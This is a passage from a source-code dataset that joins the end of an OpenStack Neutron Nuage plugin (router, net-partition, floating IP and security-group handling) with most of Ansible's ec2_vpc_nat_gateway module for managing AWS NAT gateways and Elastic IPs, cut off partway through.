else:
router_updated = super(NuagePlugin, self).update_router(
context, id, router)
return router_updated
def delete_router(self, context, id):
neutron_router = self.get_router(context, id)
session = context.session
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(session,
id)
if ent_rtr_mapping:
filters = {
'device_id': [id],
'device_owner': [os_constants.DEVICE_OWNER_ROUTER_INTF]
}
ports = self.get_ports(context, filters)
if ports:
raise l3.RouterInUse(router_id=id)
nuage_domain_id = ent_rtr_mapping['nuage_router_id']
self.nuageclient.delete_router(nuage_domain_id)
super(NuagePlugin, self).delete_router(context, id)
nuage_zone = self.nuageclient.get_zone_by_routerid(id)
if nuage_zone and not self._check_router_subnet_for_tenant(
context, neutron_router['tenant_id']):
user_id, group_id = self.nuageclient.get_usergroup(
neutron_router['tenant_id'],
ent_rtr_mapping['net_partition_id'])
self.nuageclient.delete_user(user_id)
self.nuageclient.delete_group(group_id)
def _make_net_partition_dict(self, net_partition, fields=None):
res = {
'id': net_partition['id'],
'name': net_partition['name'],
'l3dom_tmplt_id': net_partition['l3dom_tmplt_id'],
'l2dom_tmplt_id': net_partition['l2dom_tmplt_id'],
}
return self._fields(res, fields)
def _create_net_partition(self, session, net_part_name):
fip_quota = cfg.CONF.RESTPROXY.default_floatingip_quota
params = {
"name": net_part_name,
"fp_quota": str(fip_quota)
}
nuage_net_partition = self.nuageclient.create_net_partition(params)
net_partitioninst = None
if nuage_net_partition:
nuage_entid = nuage_net_partition['nuage_entid']
l3dom_id = nuage_net_partition['l3dom_id']
l2dom_id = nuage_net_partition['l2dom_id']
with session.begin():
net_partitioninst = nuagedb.add_net_partition(session,
nuage_entid,
l3dom_id,
l2dom_id,
net_part_name)
if not net_partitioninst:
return {}
return self._make_net_partition_dict(net_partitioninst)
def _create_default_net_partition(self, default_net_part):
def_netpart = self.nuageclient.get_def_netpartition_data(
default_net_part)
session = db.get_session()
if def_netpart:
net_partition = nuagedb.get_net_partition_by_name(
session, default_net_part)
with session.begin(subtransactions=True):
if net_partition:
nuagedb.delete_net_partition(session, net_partition)
net_part = nuagedb.add_net_partition(session,
def_netpart['np_id'],
def_netpart['l3dom_tid'],
def_netpart['l2dom_tid'],
default_net_part)
return self._make_net_partition_dict(net_part)
else:
return self._create_net_partition(session, default_net_part)
def create_net_partition(self, context, net_partition):
ent = net_partition['net_partition']
session = context.session
return self._create_net_partition(session, ent["name"])
def delete_net_partition(self, context, id):
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_entid(context.session,
id)
if ent_rtr_mapping:
msg = (_("One or more router still attached to "
"net_partition %s.") % id)
raise n_exc.BadRequest(resource='net_partition', msg=msg)
net_partition = nuagedb.get_net_partition_by_id(context.session, id)
if not net_partition:
msg = (_("NetPartition with %s does not exist") % id)
raise n_exc.BadRequest(resource='net_partition', msg=msg)
l3dom_tmplt_id = net_partition['l3dom_tmplt_id']
l2dom_tmplt_id = net_partition['l2dom_tmplt_id']
self.nuageclient.delete_net_partition(net_partition['id'],
l3dom_id=l3dom_tmplt_id,
l2dom_id=l2dom_tmplt_id)
with context.session.begin(subtransactions=True):
nuagedb.delete_net_partition(context.session,
net_partition)
def get_net_partition(self, context, id, fields=None):
net_partition = nuagedb.get_net_partition_by_id(context.session,
id)
return self._make_net_partition_dict(net_partition)
def get_net_partitions(self, context, filters=None, fields=None):
net_partitions = nuagedb.get_net_partitions(context.session,
filters=filters,
fields=fields)
return [self._make_net_partition_dict(net_partition, fields)
for net_partition in net_partitions]
def _check_floatingip_update(self, context, port):
filter = {'fixed_port_id': [port['id']]}
local_fip = self.get_floatingips(context,
filters=filter)
if local_fip:
fip = local_fip[0]
self._create_update_floatingip(context,
fip, port['id'])
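    # _create_update_floatingip looks up the Nuage FIP pool behind the external
    # subnet, verifies the router's net-partition mapping, creates (or reuses)
    # the floating IP on VSD and finally attaches it to the port's vport.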
def _create_update_floatingip(self, context,
neutron_fip, port_id):
rtr_id = neutron_fip['router_id']
net_id = neutron_fip['floating_network_id']
subn = nuagedb.get_ipalloc_for_fip(context.session,
net_id,
neutron_fip['floating_ip_address'])
fip_pool = self.nuageclient.get_nuage_fip_pool_by_id(subn['subnet_id'])
if not fip_pool:
msg = _('sharedresource %s not found on VSD') % subn['subnet_id']
raise n_exc.BadRequest(resource='floatingip',
msg=msg)
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(context.session,
rtr_id)
if not ent_rtr_mapping:
msg = _('router %s is not associated with '
'any net-partition') % rtr_id
raise n_exc.BadRequest(resource='floatingip',
msg=msg)
params = {
'router_id': ent_rtr_mapping['nuage_router_id'],
'fip_id': neutron_fip['id'],
'neutron_fip': neutron_fip
}
fip = self.nuageclient.get_nuage_fip_by_id(params)
if not fip:
params = {
'nuage_rtr_id': ent_rtr_mapping['nuage_router_id'],
'nuage_fippool_id': fip_pool['nuage_fip_pool_id'],
'neutron_fip_ip': neutron_fip['floating_ip_address'],
'neutron_fip_id': neutron_fip['id']
}
nuage_fip_id = self.nuageclient.create_nuage_floatingip(params)
else:
nuage_fip_id = fip['nuage_fip_id']
# Update VM if required
params = {
'neutron_port_id': port_id,
'nuage_fip_id': nuage_fip_id,
'nuage_rtr_id': ent_rtr_mapping['nuage_router_id']
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if nuage_port:
if (nuage_port['nuage_domain_id']) != (
ent_rtr_mapping['nuage_router_id']):
msg = _('Floating IP can not be associated to VM in '
'different router context')
raise nuage_exc.OperationNotSupported(msg=msg)
params = {
'nuage_vport_id': nuage_port['nuage_vport_id'],
'nuage_fip_id': nuage_fip_id
}
self.nuageclient.update_nuage_vm_vport(params)
def create_floatingip(self, context, floatingip):
fip = floatingip['floatingip']
with context.session.begin(subtransactions=True):
neutron_fip = super(NuagePlugin, self).create_floatingip(
context, floatingip)
if not neutron_fip['router_id']:
return neutron_fip
try:
self._create_update_floatingip(context, neutron_fip,
fip['port_id'])
except (nuage_exc.OperationNotSupported, n_exc.BadRequest):
with excutils.save_and_reraise_exception():
super(NuagePlugin, self).delete_floatingip(
context, neutron_fip['id'])
return neutron_fip
def disassociate_floatingips(self, context, port_id, do_notify=True):
router_ids = super(NuagePlugin, self).disassociate_floatingips(
context, port_id, do_notify=do_notify)
params = {
'neutron_port_id': port_id,
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if nuage_port:
params = {
'nuage_vport_id': nuage_port['nuage_vport_id'],
'nuage_fip_id': None
}
self.nuageclient.update_nuage_vm_vport(params)
return router_ids
def update_floatingip(self, context, id, floatingip):
fip = floatingip['floatingip']
orig_fip = self._get_floatingip(context, id)
port_id = orig_fip['fixed_port_id']
router_ids = []
with context.session.begin(subtransactions=True):
neutron_fip = super(NuagePlugin, self).update_floatingip(
context, id, floatingip)
if fip['port_id'] is not None:
if not neutron_fip['router_id']:
ret_msg = 'floating-ip is not associated yet'
raise n_exc.BadRequest(resource='floatingip',
msg=ret_msg)
try:
self._create_update_floatingip(context,
neutron_fip,
fip['port_id'])
except nuage_exc.OperationNotSupported:
with excutils.save_and_reraise_exception():
router_ids = super(
NuagePlugin, self).disassociate_floatingips(
context, fip['port_id'], do_notify=False)
except n_exc.BadRequest:
with excutils.save_and_reraise_exception():
super(NuagePlugin, self).delete_floatingip(context,
id)
else:
params = {
'neutron_port_id': port_id,
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if nuage_port:
params = {
'nuage_vport_id': nuage_port['nuage_vport_id'],
'nuage_fip_id': None
}
self.nuageclient.update_nuage_vm_vport(params)
# now that we've left db transaction, we are safe to notify
self.notify_routers_updated(context, router_ids)
return neutron_fip
def delete_floatingip(self, context, fip_id):
fip = self._get_floatingip(context, fip_id)
port_id = fip['fixed_port_id']
with context.session.begin(subtransactions=True):
if port_id:
params = {
'neutron_port_id': port_id,
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if (nuage_port and
nuage_port['nuage_vport_id'] is not None):
params = {
'nuage_vport_id': nuage_port['nuage_vport_id'],
'nuage_fip_id': None
}
self.nuageclient.update_nuage_vm_vport(params)
LOG.debug("Floating-ip %(fip)s is disassociated from "
"vport %(vport)s",
{'fip': fip_id,
'vport': nuage_port['nuage_vport_id']})
router_id = fip['router_id']
else:
router_id = fip['last_known_router_id']
if router_id:
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(
context.session,
router_id)
if not ent_rtr_mapping:
msg = _('router %s is not associated with '
'any net-partition') % router_id
raise n_exc.BadRequest(resource='floatingip',
msg=msg)
params = {
'router_id': ent_rtr_mapping['nuage_router_id'],
'fip_id': fip_id
}
fip = self.nuageclient.get_nuage_fip_by_id(params)
if fip:
self.nuageclient.delete_nuage_floatingip(
fip['nuage_fip_id'])
LOG.debug('Floating-ip %s deleted from VSD', fip_id)
super(NuagePlugin, self).delete_floatingip(context, fip_id)
def delete_security_group(self, context, id):
filters = {'security_group_id': [id]}
ports = self._get_port_security_group_bindings(context,
filters)
if ports:
raise ext_sg.SecurityGroupInUse(id=id)
sg_rules = self.get_security_group_rules(context,
{'security_group_id': [id]})
if sg_rules:
self.nuageclient.delete_nuage_sgrule(sg_rules)
self.nuageclient.delete_nuage_secgroup(id)
super(NuagePlugin, self).delete_security_group(context, id)
def create_security_group_rule(self, context, security_group_rule):
sg_rule = security_group_rule['security_group_rule']
self.nuageclient.validate_nuage_sg_rule_definition(sg_rule)
sg_id = sg_rule['security_group_id']
local_sg_rule = super(NuagePlugin,
self).create_security_group_rule(
context, security_group_rule)
try:
nuage_vptag = self.nuageclient.get_sg_vptag_mapping(sg_id)
if nuage_vptag:
sg_params = {
'sg_id': sg_id,
'neutron_sg_rule': local_sg_rule,
'vptag': nuage_vptag
}
self.nuageclient.create_nuage_sgrule(sg_params)
except Exception:
with excutils.save_and_reraise_exception():
super(NuagePlugin,
self).delete_security_group_rule(context,
local_sg_rule['id'])
return local_sg_rule
def delete_security_group_rule(self, context, id):
local_sg_rule = self.get_security_group_rule(context, id)
super(NuagePlugin, self).delete_security_group_rule(context, id)
self.nuageclient.delete_nuage_sgrule([local_sg_rule])
| 47.247741 | 79 | 0.544936 |
09fc70de33560091e2f3692054d80d2dddda1376 | 32,890 | py | Python | Ansible-AWS-Provisioning/collections/ansible_collections/community/aws/plugins/modules/ec2_vpc_nat_gateway.py | ginigangadharan/ansible-real-life | 897c2fc0d05babbb540768b336b6ad399dad5bfa | ["MIT"] | 22 | 2021-07-16T08:11:22.000Z | 2022-03-31T07:15:34.000Z | Ansible-AWS-Provisioning/collections/ansible_collections/community/aws/plugins/modules/ec2_vpc_nat_gateway.py | premsagar0228/ansible-real-life | 1a51193b833ab6ad320100472333b9ffb0da39d4 | ["MIT"] | null | null | null | Ansible-AWS-Provisioning/collections/ansible_collections/community/aws/plugins/modules/ec2_vpc_nat_gateway.py | premsagar0228/ansible-real-life | 1a51193b833ab6ad320100472333b9ffb0da39d4 | ["MIT"] | 39 | 2021-07-05T02:31:42.000Z | 2022-03-31T02:46:03.000Z |
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_vpc_nat_gateway
short_description: Manage AWS VPC NAT Gateways.
description:
- Ensure the state of AWS VPC NAT Gateways based on their id, allocation and subnet ids.
requirements: [boto3, botocore]
options:
state:
description:
- Ensure NAT Gateway is present or absent.
default: "present"
choices: ["present", "absent"]
type: str
nat_gateway_id:
description:
- The id AWS dynamically allocates to the NAT Gateway on creation.
      This is required when state is absent.
type: str
subnet_id:
description:
- The id of the subnet to create the NAT Gateway in. This is required
with the present option.
type: str
allocation_id:
description:
      - The id of the elastic IP allocation. If neither this nor the
        eip_address is passed, an EIP is generated for this NAT Gateway.
type: str
eip_address:
description:
- The elastic IP address of the EIP you want attached to this NAT Gateway.
If this is not passed and the allocation_id is not passed,
an EIP is generated for this NAT Gateway.
type: str
if_exist_do_not_create:
description:
      - If a NAT Gateway already exists in the subnet_id, do not create a new one.
required: false
default: false
type: bool
release_eip:
description:
- Deallocate the EIP from the VPC.
- Option is only valid with the absent state.
      - You should use this with the wait option, since you cannot release an address while a delete operation is in progress.
default: false
type: bool
wait:
description:
- Wait for operation to complete before returning.
default: false
type: bool
wait_timeout:
description:
- How many seconds to wait for an operation to complete before timing out.
default: 320
type: int
client_token:
description:
- Optional unique token to be used during create to ensure idempotency.
When specifying this option, ensure you specify the eip_address parameter
        as well, otherwise any subsequent runs will fail.
type: str
author:
- Allen Sanabria (@linuxdynasty)
- Jon Hadfield (@jonhadfield)
- Karen Cheng (@Etherdaemon)
extends_documentation_fragment:
- amazon.aws.aws
- amazon.aws.ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- name: Create new nat gateway with client token.
ec2_vpc_nat_gateway:
state: present
subnet_id: subnet-12345678
eip_address: 52.1.1.1
region: ap-southeast-2
client_token: abcd-12345678
register: new_nat_gateway
- name: Create new nat gateway using an allocation-id.
ec2_vpc_nat_gateway:
state: present
subnet_id: subnet-12345678
allocation_id: eipalloc-12345678
region: ap-southeast-2
register: new_nat_gateway
- name: Create new nat gateway, using an EIP address and wait for available status.
ec2_vpc_nat_gateway:
state: present
subnet_id: subnet-12345678
eip_address: 52.1.1.1
wait: true
region: ap-southeast-2
register: new_nat_gateway
- name: Create new nat gateway and allocate new EIP.
ec2_vpc_nat_gateway:
state: present
subnet_id: subnet-12345678
wait: true
region: ap-southeast-2
register: new_nat_gateway
- name: Create new nat gateway and allocate new EIP if a nat gateway does not yet exist in the subnet.
ec2_vpc_nat_gateway:
state: present
subnet_id: subnet-12345678
wait: true
region: ap-southeast-2
if_exist_do_not_create: true
register: new_nat_gateway
- name: Delete nat gateway using discovered nat gateways from facts module.
ec2_vpc_nat_gateway:
state: absent
region: ap-southeast-2
wait: true
nat_gateway_id: "{{ item.NatGatewayId }}"
release_eip: true
register: delete_nat_gateway_result
loop: "{{ gateways_to_remove.result }}"
- name: Delete nat gateway and wait for deleted status.
ec2_vpc_nat_gateway:
state: absent
nat_gateway_id: nat-12345678
wait: true
wait_timeout: 500
region: ap-southeast-2
- name: Delete nat gateway and release EIP.
ec2_vpc_nat_gateway:
state: absent
nat_gateway_id: nat-12345678
release_eip: true
wait: yes
wait_timeout: 300
region: ap-southeast-2
'''
RETURN = '''
create_time:
  description: The creation time of the NAT Gateway, in ISO 8601 format (UTC).
returned: In all cases.
type: str
sample: "2016-03-05T05:19:20.282000+00:00'"
nat_gateway_id:
description: id of the VPC NAT Gateway
returned: In all cases.
type: str
sample: "nat-0d1e3a878585988f8"
subnet_id:
description: id of the Subnet
returned: In all cases.
type: str
sample: "subnet-12345"
state:
description: The current state of the NAT Gateway.
returned: In all cases.
type: str
sample: "available"
vpc_id:
description: id of the VPC.
returned: In all cases.
type: str
sample: "vpc-12345"
nat_gateway_addresses:
description: List of dictionaries containing the public_ip, network_interface_id, private_ip, and allocation_id.
returned: In all cases.
  type: list
sample: [
{
'public_ip': '52.52.52.52',
'network_interface_id': 'eni-12345',
'private_ip': '10.0.0.100',
'allocation_id': 'eipalloc-12345'
}
]
'''
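# Illustrative follow-up (not part of this module): a play that registers the
# module's result, e.g. ``register: new_nat_gateway``, can read the RETURN
# values documented above in later tasks:
#
#   - name: Show the allocated NAT gateway id
#     debug:
#       msg: "{{ new_nat_gateway.nat_gateway_id }} in {{ new_nat_gateway.vpc_id }}"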
import datetime
import random
import time
try:
import botocore
except ImportError:
pass # caught by imported HAS_BOTO3
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.amazon.aws.plugins.module_utils.ec2 import (ec2_argument_spec,
get_aws_connection_info,
boto3_conn,
camel_dict_to_snake_dict,
HAS_BOTO3,
)
DRY_RUN_GATEWAYS = [
{
"nat_gateway_id": "nat-123456789",
"subnet_id": "subnet-123456789",
"nat_gateway_addresses": [
{
"public_ip": "55.55.55.55",
"network_interface_id": "eni-1234567",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-1234567"
}
],
"state": "available",
"create_time": "2016-03-05T05:19:20.282000+00:00",
"vpc_id": "vpc-12345678"
}
]
DRY_RUN_ALLOCATION_UNCONVERTED = {
'Addresses': [
{
'PublicIp': '55.55.55.55',
'Domain': 'vpc',
'AllocationId': 'eipalloc-1234567'
}
]
}
DRY_RUN_MSGS = 'DryRun Mode:'
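# The DRY_RUN_* structures above stand in for real AWS responses when the module
# runs in check mode, letting the helper functions below exercise their logic
# without calling EC2.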
def get_nat_gateways(client, subnet_id=None, nat_gateway_id=None,
states=None, check_mode=False):
"""Retrieve a list of NAT Gateways
Args:
client (botocore.client.EC2): Boto3 client
Kwargs:
subnet_id (str): The subnet_id the nat resides in.
nat_gateway_id (str): The Amazon nat id.
states (list): States available (pending, failed, available, deleting, and deleted)
default=None
Basic Usage:
>>> client = boto3.client('ec2')
>>> subnet_id = 'subnet-12345678'
>>> get_nat_gateways(client, subnet_id)
[
true,
"",
{
"nat_gateway_id": "nat-123456789",
"subnet_id": "subnet-123456789",
"nat_gateway_addresses": [
{
"public_ip": "55.55.55.55",
"network_interface_id": "eni-1234567",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-1234567"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-12345678"
            }
        ]
Returns:
Tuple (bool, str, list)
"""
params = dict()
err_msg = ""
gateways_retrieved = False
existing_gateways = list()
if not states:
states = ['available', 'pending']
if nat_gateway_id:
params['NatGatewayIds'] = [nat_gateway_id]
else:
params['Filter'] = [
{
'Name': 'subnet-id',
'Values': [subnet_id]
},
{
'Name': 'state',
'Values': states
}
]
try:
if not check_mode:
gateways = client.describe_nat_gateways(**params)['NatGateways']
if gateways:
for gw in gateways:
existing_gateways.append(camel_dict_to_snake_dict(gw))
gateways_retrieved = True
else:
gateways_retrieved = True
if nat_gateway_id:
if DRY_RUN_GATEWAYS[0]['nat_gateway_id'] == nat_gateway_id:
existing_gateways = DRY_RUN_GATEWAYS
elif subnet_id:
if DRY_RUN_GATEWAYS[0]['subnet_id'] == subnet_id:
existing_gateways = DRY_RUN_GATEWAYS
err_msg = '{0} Retrieving gateways'.format(DRY_RUN_MSGS)
except botocore.exceptions.ClientError as e:
err_msg = str(e)
return gateways_retrieved, err_msg, existing_gateways
def wait_for_status(client, wait_timeout, nat_gateway_id, status,
check_mode=False):
"""Wait for the NAT Gateway to reach a status
Args:
client (botocore.client.EC2): Boto3 client
wait_timeout (int): Number of seconds to wait, until this timeout is reached.
nat_gateway_id (str): The Amazon nat id.
status (str): The status to wait for.
examples. status=available, status=deleted
Basic Usage:
        >>> client = boto3.client('ec2')
        >>> nat_gateway_id = 'nat-123456789'
        >>> wait_for_status(client, 500, nat_gateway_id, 'deleted')
[
true,
"",
{
"nat_gateway_id": "nat-123456789",
"subnet_id": "subnet-1234567",
"nat_gateway_addresses": [
{
"public_ip": "55.55.55.55",
"network_interface_id": "eni-1234567",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-12345678"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-12345677"
}
]
Returns:
Tuple (bool, str, dict)
"""
polling_increment_secs = 5
wait_timeout = time.time() + wait_timeout
status_achieved = False
nat_gateway = dict()
states = ['pending', 'failed', 'available', 'deleting', 'deleted']
err_msg = ""
while wait_timeout > time.time():
try:
gws_retrieved, err_msg, nat_gateways = (
get_nat_gateways(
client, nat_gateway_id=nat_gateway_id,
states=states, check_mode=check_mode
)
)
if gws_retrieved and nat_gateways:
nat_gateway = nat_gateways[0]
if check_mode:
nat_gateway['state'] = status
if nat_gateway.get('state') == status:
status_achieved = True
break
elif nat_gateway.get('state') == 'failed':
err_msg = nat_gateway.get('failure_message')
break
elif nat_gateway.get('state') == 'pending':
if 'failure_message' in nat_gateway:
err_msg = nat_gateway.get('failure_message')
status_achieved = False
break
else:
time.sleep(polling_increment_secs)
except botocore.exceptions.ClientError as e:
err_msg = str(e)
if not status_achieved:
err_msg = "Wait time out reached, while waiting for results"
return status_achieved, err_msg, nat_gateway
def gateway_in_subnet_exists(client, subnet_id, allocation_id=None,
check_mode=False):
"""Retrieve all NAT Gateways for a subnet.
    Args:
        client (botocore.client.EC2): Boto3 client
        subnet_id (str): The subnet_id the nat resides in.
Kwargs:
allocation_id (str): The EIP Amazon identifier.
default = None
Basic Usage:
>>> client = boto3.client('ec2')
>>> subnet_id = 'subnet-1234567'
>>> allocation_id = 'eipalloc-1234567'
>>> gateway_in_subnet_exists(client, subnet_id, allocation_id)
(
[
{
"nat_gateway_id": "nat-123456789",
"subnet_id": "subnet-123456789",
"nat_gateway_addresses": [
{
"public_ip": "55.55.55.55",
"network_interface_id": "eni-1234567",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-1234567"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-1234567"
}
],
False
)
Returns:
Tuple (list, bool)
"""
allocation_id_exists = False
gateways = []
states = ['available', 'pending']
gws_retrieved, err_msg, gws = (
get_nat_gateways(
client, subnet_id, states=states, check_mode=check_mode
)
)
if not gws_retrieved:
return gateways, allocation_id_exists
for gw in gws:
for address in gw['nat_gateway_addresses']:
if allocation_id:
if address.get('allocation_id') == allocation_id:
allocation_id_exists = True
gateways.append(gw)
else:
gateways.append(gw)
return gateways, allocation_id_exists
def get_eip_allocation_id_by_address(client, eip_address, check_mode=False):
"""Release an EIP from your EIP Pool
Args:
client (botocore.client.EC2): Boto3 client
eip_address (str): The Elastic IP Address of the EIP.
Kwargs:
check_mode (bool): if set to true, do not run anything and
falsify the results.
Basic Usage:
>>> client = boto3.client('ec2')
>>> eip_address = '52.87.29.36'
>>> get_eip_allocation_id_by_address(client, eip_address)
'eipalloc-36014da3'
Returns:
Tuple (str, str)
"""
params = {
'PublicIps': [eip_address],
}
allocation_id = None
err_msg = ""
try:
if not check_mode:
allocations = client.describe_addresses(**params)['Addresses']
if len(allocations) == 1:
allocation = allocations[0]
else:
allocation = None
else:
dry_run_eip = (
DRY_RUN_ALLOCATION_UNCONVERTED['Addresses'][0]['PublicIp']
)
if dry_run_eip == eip_address:
allocation = DRY_RUN_ALLOCATION_UNCONVERTED['Addresses'][0]
else:
allocation = None
if allocation:
if allocation.get('Domain') != 'vpc':
err_msg = (
"EIP {0} is a non-VPC EIP, please allocate a VPC scoped EIP"
.format(eip_address)
)
else:
allocation_id = allocation.get('AllocationId')
else:
err_msg = (
"EIP {0} does not exist".format(eip_address)
)
except botocore.exceptions.ClientError as e:
err_msg = str(e)
return allocation_id, err_msg
def allocate_eip_address(client, check_mode=False):
"""Release an EIP from your EIP Pool
Args:
client (botocore.client.EC2): Boto3 client
Kwargs:
check_mode (bool): if set to true, do not run anything and
falsify the results.
Basic Usage:
>>> client = boto3.client('ec2')
        >>> allocate_eip_address(client)
        (True, 'eipalloc id eipalloc-1234567 created', 'eipalloc-1234567')
    Returns:
        Tuple (bool, str, str)
"""
ip_allocated = False
new_eip = None
err_msg = ''
params = {
'Domain': 'vpc',
}
try:
if check_mode:
ip_allocated = True
random_numbers = (
''.join(str(x) for x in random.sample(range(0, 9), 7))
)
new_eip = 'eipalloc-{0}'.format(random_numbers)
else:
new_eip = client.allocate_address(**params)['AllocationId']
ip_allocated = True
err_msg = 'eipalloc id {0} created'.format(new_eip)
except botocore.exceptions.ClientError as e:
err_msg = str(e)
return ip_allocated, err_msg, new_eip
def release_address(client, allocation_id, check_mode=False):
"""Release an EIP from your EIP Pool
Args:
client (botocore.client.EC2): Boto3 client
allocation_id (str): The eip Amazon identifier.
Kwargs:
check_mode (bool): if set to true, do not run anything and
falsify the results.
Basic Usage:
>>> client = boto3.client('ec2')
>>> allocation_id = "eipalloc-123456"
>>> release_address(client, allocation_id)
True
Returns:
Boolean, string
"""
err_msg = ''
if check_mode:
return True, ''
ip_released = False
try:
client.describe_addresses(AllocationIds=[allocation_id])
except botocore.exceptions.ClientError as e:
# IP address likely already released
# Happens with gateway in 'deleted' state that
# still lists associations
return True, str(e)
try:
client.release_address(AllocationId=allocation_id)
ip_released = True
except botocore.exceptions.ClientError as e:
err_msg = str(e)
return ip_released, err_msg
def create(client, subnet_id, allocation_id, client_token=None,
wait=False, wait_timeout=0, if_exist_do_not_create=False,
check_mode=False):
"""Create an Amazon NAT Gateway.
Args:
client (botocore.client.EC2): Boto3 client
subnet_id (str): The subnet_id the nat resides in.
allocation_id (str): The eip Amazon identifier.
Kwargs:
if_exist_do_not_create (bool): if a nat gateway already exists in this
            subnet, then do not create another one.
default = False
        wait (bool): Wait for the nat gateway to be in the available state before returning.
default = False
wait_timeout (int): Number of seconds to wait, until this timeout is reached.
default = 0
client_token (str):
default = None
Basic Usage:
>>> client = boto3.client('ec2')
>>> subnet_id = 'subnet-1234567'
>>> allocation_id = 'eipalloc-1234567'
>>> create(client, subnet_id, allocation_id, if_exist_do_not_create=True, wait=True, wait_timeout=500)
[
true,
"",
{
"nat_gateway_id": "nat-123456789",
"subnet_id": "subnet-1234567",
"nat_gateway_addresses": [
{
"public_ip": "55.55.55.55",
"network_interface_id": "eni-1234567",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-1234567"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-1234567"
}
]
Returns:
        Tuple (bool, bool, str, dict)
"""
params = {
'SubnetId': subnet_id,
'AllocationId': allocation_id
}
request_time = datetime.datetime.utcnow()
changed = False
success = False
token_provided = False
err_msg = ""
if client_token:
token_provided = True
params['ClientToken'] = client_token
try:
if not check_mode:
result = camel_dict_to_snake_dict(client.create_nat_gateway(**params)["NatGateway"])
else:
result = DRY_RUN_GATEWAYS[0]
result['create_time'] = datetime.datetime.utcnow()
result['nat_gateway_addresses'][0]['allocation_id'] = allocation_id
result['subnet_id'] = subnet_id
success = True
changed = True
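        # If a client token was supplied and the gateway's creation time predates
        # this request, an existing gateway was matched (idempotent create), so
        # report the resource as unchanged.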
create_time = result['create_time'].replace(tzinfo=None)
if token_provided and (request_time > create_time):
changed = False
elif wait:
success, err_msg, result = (
wait_for_status(
client, wait_timeout, result['nat_gateway_id'], 'available',
check_mode=check_mode
)
)
if success:
err_msg = (
'NAT gateway {0} created'.format(result['nat_gateway_id'])
)
except botocore.exceptions.ClientError as e:
if "IdempotentParameterMismatch" in e.message:
err_msg = (
'NAT Gateway does not support update and token has already been provided: ' + str(e)
)
else:
err_msg = str(e)
success = False
changed = False
result = None
return success, changed, err_msg, result
def pre_create(client, subnet_id, allocation_id=None, eip_address=None,
if_exist_do_not_create=False, wait=False, wait_timeout=0,
client_token=None, check_mode=False):
"""Create an Amazon NAT Gateway.
Args:
client (botocore.client.EC2): Boto3 client
subnet_id (str): The subnet_id the nat resides in.
Kwargs:
allocation_id (str): The EIP Amazon identifier.
default = None
eip_address (str): The Elastic IP Address of the EIP.
default = None
if_exist_do_not_create (bool): if a nat gateway already exists in this
            subnet, then do not create another one.
default = False
        wait (bool): Wait for the nat gateway to be in the available state before returning.
default = False
wait_timeout (int): Number of seconds to wait, until this timeout is reached.
default = 0
client_token (str):
default = None
Basic Usage:
>>> client = boto3.client('ec2')
>>> subnet_id = 'subnet-w4t12897'
>>> allocation_id = 'eipalloc-36014da3'
>>> pre_create(client, subnet_id, allocation_id, if_exist_do_not_create=True, wait=True, wait_timeout=500)
[
true,
"",
{
"nat_gateway_id": "nat-03835afb6e31df79b",
"subnet_id": "subnet-w4t12897",
"nat_gateway_addresses": [
{
"public_ip": "52.87.29.36",
"network_interface_id": "eni-5579742d",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-36014da3"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-w68571b5"
}
]
Returns:
Tuple (bool, bool, str, list)
"""
success = False
changed = False
err_msg = ""
results = list()
if not allocation_id and not eip_address:
existing_gateways, allocation_id_exists = (
gateway_in_subnet_exists(client, subnet_id, check_mode=check_mode)
)
if len(existing_gateways) > 0 and if_exist_do_not_create:
success = True
changed = False
results = existing_gateways[0]
err_msg = (
'NAT Gateway {0} already exists in subnet_id {1}'
.format(
existing_gateways[0]['nat_gateway_id'], subnet_id
)
)
return success, changed, err_msg, results
else:
success, err_msg, allocation_id = (
allocate_eip_address(client, check_mode=check_mode)
)
if not success:
                return success, False, err_msg, dict()
elif eip_address or allocation_id:
if eip_address and not allocation_id:
allocation_id, err_msg = (
get_eip_allocation_id_by_address(
client, eip_address, check_mode=check_mode
)
)
if not allocation_id:
success = False
changed = False
return success, changed, err_msg, dict()
existing_gateways, allocation_id_exists = (
gateway_in_subnet_exists(
client, subnet_id, allocation_id, check_mode=check_mode
)
)
if len(existing_gateways) > 0 and (allocation_id_exists or if_exist_do_not_create):
success = True
changed = False
results = existing_gateways[0]
err_msg = (
'NAT Gateway {0} already exists in subnet_id {1}'
.format(
existing_gateways[0]['nat_gateway_id'], subnet_id
)
)
return success, changed, err_msg, results
success, changed, err_msg, results = create(
client, subnet_id, allocation_id, client_token,
wait, wait_timeout, if_exist_do_not_create, check_mode=check_mode
)
return success, changed, err_msg, results
def remove(client, nat_gateway_id, wait=False, wait_timeout=0,
release_eip=False, check_mode=False):
